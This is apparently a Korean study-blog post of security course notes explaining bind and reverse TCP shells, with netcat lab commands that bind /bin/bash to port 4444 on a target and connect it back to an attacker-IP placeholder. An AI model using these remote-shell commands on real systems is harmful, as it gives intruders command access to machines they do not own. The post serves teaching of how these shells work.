1. Bind TCP
- 공격자가 타겟으로 TCP Syn를 전송하여 TCP 연결을 실시하는 공격이다.
- 이때, 타겟은 특정 포트에 대해서 TCP 연결 대기 상태(Listen)가 되어야 한다. (Ex : 백도어)
- 타겟이 공인 IP 환경이라면 Bind TCP 공격이 가능하지만, 사설 IP 환경이라면 공격이 불가능하다.
- 단, 포트 포워딩(정적 NAT)이 구성된 서버 및 시스템은 공격이 가능하다.
1-1. Bind TCP 실습
- 타겟에서 'nc'를 이용하여 TCP 포트 4444 연결 대기 상태로 설정한다.
./nc -e /bin/bash -vlp 4444 &
netstat -nltp | head -2 ; netstat -nltp | grep 4444
- 공격자는 TCP Syn를 전송하여 Bind TCP 연결을 실시한다.
nc [타겟IP] 4444
2. Reverse TCP
- 타켓이 공격자쪽으로 TCP Syn를 전송하여 TCP 연결을 실시하는 공격이다.
- 이때, 공격자는 특정 포트에 대해서 TCP 연결 대기 상태(Listen)가 되어야 한다.
- 내부 타겟이 사설 or 공인 IP 환경에서 사용이 가능하다.
2-1. Reverse TCP 실습
- 공격자에서 'nc'를 이용하여 TCP 포트 4444 연결 대기 상태로 설정한다.
nc -nvlp 4444
netstat -nltp
- 타겟이 TCP Syn를 전송하여 Reverse TCP 연결을 실시한다.
./nc -e /bin/bash [공격자 IP] 4444
[참고] nc(netcat)
-n : 도메인 이름 대신에 번호(IP 주소/포트 번호)로 출력
-v : 상세 정보 출력
-p : 대기 포트 지정
-l : TCP 대기 상태 설정
'메가IT아카데미 국기과정 > 리눅스와 시스템보안' 카테고리의 다른 글
| [3-3] Nmap 스캔 (0) | 2022.09.12 |
|---|---|
| [3-2] SetUID 특수 권한 (0) | 2022.09.12 |
| [2-14] NTP 서버 (0) | 2022.09.12 |
| [2-13] DHCP 서버 (0) | 2022.09.12 |
| [2-11] Email 서버 (0) | 2022.09.12 |